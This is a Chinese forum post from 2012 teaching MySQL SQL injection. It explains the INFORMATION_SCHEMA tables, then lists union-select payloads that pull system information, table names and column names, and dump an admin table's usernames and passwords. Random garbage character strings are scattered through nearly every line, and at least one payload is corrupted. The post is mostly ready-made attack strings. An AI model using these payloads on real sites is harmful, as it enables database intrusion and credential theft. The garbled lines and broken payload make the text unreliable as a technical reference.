本文介绍MYSQL盲注的一些语句和方法
. t) |! p: l9 ?
" J: {! y- J m2 d学习盲注前先了解下 IFORMATION_SCHEMA 库
, r0 w& I6 H( M. I7 q& A( [2 N+ h8 r5 W2 t5 |& q! }* _& j3 t! r
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有' b! J8 O/ v% P5 U
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。
1 g) v: s4 r- c+ w9 c z1.得到所有数据库名:' p1 O" B+ t, x/ a- M
|SCHEMATA ->存储数据库名的表 s" I g$ E e* a- g/ C
|---字段:SCHEMA_NAME ->数据库名称; K. O* E+ G- ]8 w% e( P0 Z+ [
9 y# N& z6 I* z% Z|TABLES ->存储表名2 g! i) ~6 s6 V2 L& K; x$ ~. `/ k
|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名
$ v9 ~* x& y+ P( s|---字段:TABLE_NAME ->存储表的表名4 [1 X! G- k2 x1 p* }. i
! I C+ s3 `+ Y|COLUMNS ->存储的字段名表5 Q1 [) P/ F. O0 ^! V9 k
|---字段:TABLE_SCHEMA ->该字段所属数据库名
8 i! r' F) d. ~/ l! v5 X3 z- \& }|---字段:TABLE_NAME ->存储所属表的名称
6 O; T4 a; m& n- \1 E- n- b
4 T1 R' o/ Y# Y) h- v' y8 }: X' E|---字段:COLUMN_NAME ->该字段的名称, e, e9 s4 {( i3 \* q% A
4 ?$ L9 _9 i) ~. U) c; h
7 G8 l6 t9 t- Y$ P! V$ @7 G7 L0 _9 r3 [- |
###########################################################################; i: h/ H$ G7 D# z4 T- y
* W/ c S+ V( w1 p
0x001 获取系统信息:* N7 V8 n k2 ^+ P
# K) b* M% X+ ^& H$ Eunion select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*% \" `6 T+ O" _8 ~5 }6 S0 l0 ]2 t. C
- S" h l+ A2 w$ a) O' a. X" j/*: s: }3 O% ^. S& D+ s
& e5 y! c9 u, b9 M$ J% I8 Q5 ^@@global.version_compile_os 获取系统版本
0 a0 ^1 V) t7 N. _
3 \- e* i1 i+ d/ k; W4 w% Y@@datadir 数据库路径
& O! k' h: j5 B5 ^5 G# Tdatabase() 当前数据库名称
j! N q2 |/ n B! V1 G0x3c62723e 换行HEX值! `' k+ a$ \) A4 n. }# O
4 @8 @. O, e) R& d& K& k0 l. B- W*/
3 @+ O( h& s, J# q, y+ L' Y7 |; D( G# J2 |% q9 W
/ N& y5 C2 ~# Y- j# L4 g! o& I( |
8 [4 ]) F e8 I3 i2 Z8 ~$ m######################################################################
. _& |1 `: \* \! c% _# @/ ^3 j) x4 _9 z' V0 ]/ s2 l! Z
0x002 获取表名6 {6 \4 A* T5 ?3 m _/ w' T" }
8 C) _( d: J, S: r/ W. j9 Funion select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*
; d/ N) v& T# Z0 G0 s- Z( Z
4 `! s! F0 A9 O7 \, H3 i2 O1 v: b 9 ^/ h$ f' A k$ u: w, C* A+ c* C
7 u2 z2 P, Y R" |
/*! I) l/ K7 V1 y# w
' [, k8 j: B; H/ V; u0x67617264656e 为当前数据库名
1 \& r" X2 D7 Y# K2 b3 H4 h+ U7 Q# }4 N; r
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名% }) q6 Y p+ I1 ^0 K0 Q
& K0 `& g) \% f/ Y*/
7 v3 }/ ? ] B: ?0 H8 [! v- B1 |4 r) }: ^' s
######################################################################: z( B0 U$ L) _2 u. E: G2 D; E3 R
8 S0 k+ ~# C2 @) _
8 h6 V6 I5 Q* B/ ?0 m# e
9 R( @5 U+ J: C/ K0x003 获取字段* l7 e7 o& |* A
* D9 p/ K1 f, R( K
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*- @3 }4 w* a: t6 C6 Q; V
% s* ?2 {- K" j' c
/* v5 l* S5 Y8 l) ~
7 q1 I! I& |0 g7 i( |: v" c
group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段, K/ ]! A/ H! ?2 ]8 M
$ G( G3 n! x5 A6 X9 r8 W0 U
0x61646d696e ->选择一个表) m. z, E& c' [4 b2 Q7 r8 E; A V
% u3 }8 P! ~- X0 C5 R0x67617264656e ->数据库名1 V p: M9 f# { J8 I( b
% ?9 \& }2 x$ O* m7 c*/
& f3 M$ z6 M/ G% c/ L# [$ {2 H
' t0 N& Y1 P3 X V* o#####################################################################" I, Y' |* c( c1 B% `
; p$ @, |4 c3 |$ e
$ k9 h$ R; f. @$ `9 O, T! ], e& W. C7 s& Y' N0 N" Y
0x004 获取数据+ o/ B6 M8 K% A6 g; x
( T5 t' m/ o0 p
union select 1,2,3* x" e4 Q9 O% L" |( W J* q
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
z9 i0 Y% G) S3 z9 h4 o* s, u' f3 p1 X+ c6 ?! ~# `
union select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin: A: Z3 A0 C8 s X# h" x2 V# D5 Q! k
: x; d+ o, O/ S( v4 M* U- e+ Z ' N3 m$ E* B! ?/ P+ y( Y: k' C1 z. x
% ^' S6 X/ |0 \/ m) m+ m
/*: w0 e* c2 g& m1 e e
$ Y0 S( z& I+ z% ~3 z) a0x3c62723e 换行符号HEX编码
* H* i9 k! D5 Q$ v. v9 V" U7 D4 T% B7 ]+ L
group_concat 同时获得该字段所有数据
* i2 P, P/ ^! i) X3 p! E: b
9 h0 ]4 r: t$ ]. s*/# S+ x# b& S* S7 d% X4 b
* o7 f+ Q& J8 [3 G3 X8 M; o
|
发表于 2012-9-13 17:48:44
收藏
支持
反对